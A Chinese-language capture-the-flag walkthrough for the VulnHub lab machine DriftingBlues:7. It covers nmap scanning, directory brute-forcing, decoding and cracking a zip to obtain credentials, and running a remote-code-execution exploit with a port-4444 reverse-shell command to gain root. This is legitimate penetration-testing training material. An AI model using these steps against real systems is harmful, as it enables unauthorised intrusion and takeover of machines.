vulnhub靶机 | DriftingBlues:7 write-up

简介: vulnhub靶机 | DriftingBlues:7 write-up

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/

题目的目标是要夺到里面的flag,搭建好环境如图。

640.png

首先用nmap扫描一下ip地址


nmap -sP 192.168.110.1/24  #扫描网段中存活主机

640.png
nmap
 -p- 192.168.110.167  #在看看上面运行的服务

640.png


nmap
 -sV 192.168.110.167  #查看服务版本

640.png

上面运行的一些apache、ssh所在版本都没有漏洞,所以我们从它的80端口入手。访问80端口会被跳转到如下页面

640.png

这里尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。

640.png

扫描出来的目录也没有发现什么有价值的东西。所以只能从其他的端口进行切入了。上面扫描ip上运行的端口发现上面还有一些其他的端口,其中有一个66端口。

640.png

上面运行了一个SimpleHttpServer 0.6,所以我们进行访问。

640.png

接下来再去扫描一下它的目录结构

640.png

扫描出一个index_files文件夹,进行访问

640.png

但是里面并没有发现什么有价值的东西,然后就卡了好久,但是感觉就有一种的洞就在这里的感觉。后来打开kali用dirsearch去爆破了下目录。


python3 dirsearch.py -u http://192.168.110.167:66 -w /usr/share/wordlists/dirbuster/

640.png

发现有了另外的收获,吓得我赶快去访问试一试。

640.png

下载了一个是文件下来,打开看看。

640.png

有点相base64编码后的字符串,那我们用base64解码试一试。

640.png

PK开头,熟悉压缩包的师傅都懂了吧,这应该是一个压缩包文件了。那我们把解码后的字符串复制出来写进一个zip文件里面去,但是发现写不进去。

640.png那我们在kali上打开进行base64解码然后输出


cat eon | base64 -d>eon.zip

640.png

然后解压发现需要密码

640.png

要密码那只好爆破了

640.png

然后打开creds.txt文件可以看到账号密码

640.png

那我们回到80端口进行登陆

640.png

登陆成功

640.png

640.png

在上图可以看到版本,接下来我们搜索该版本存在什么漏洞。

640.png

有个远程代码执行漏洞,把下方exp保存到kali

640.png

现在kali上监听4444端口

640.png

然后运行脚本


python3 1.py https://192.168.110.167/ -ip 192.168.110.164 -port 4444

640.png

接收到shell,然后就是寻找flag的位置了。然后发现在root目录下

640.png

640.png


目录
相关文章
|
安全 Shell C语言
vulnhub-GoldenEye靶机通关wp(二)
vulnhub-GoldenEye靶机通关wp
167 0
vulnhub-GoldenEye靶机通关wp(二)
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
数据安全/隐私保护
vulnhub-GoldenEye靶机通关wp(一)
vulnhub-GoldenEye靶机通关wp
391 0
|
安全 Shell
vulnhub靶场—matrix-breakout-2-morpheus靶机
vulnhub靶场—matrix-breakout-2-morpheus靶机
161 2
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
115 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
137 1
VulnHub靶机DC3渗透笔记
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
SQL 算法 安全
BlackRose: 1-VulnHub
BlackRose: 1-VulnHub
|
Shell Apache 数据库
Vulnhub靶场之Me-and-My-Girlfriend(二)
Vulnhub靶场之Me-and-My-Girlfriend
131 0
Vulnhub靶场之Me-and-My-Girlfriend(二)
|
Web App开发 存储 安全
Vulnhub靶场之Me-and-My-Girlfriend(一)
Vulnhub靶场之Me-and-My-Girlfriend
203 0
Vulnhub靶场之Me-and-My-Girlfriend(一)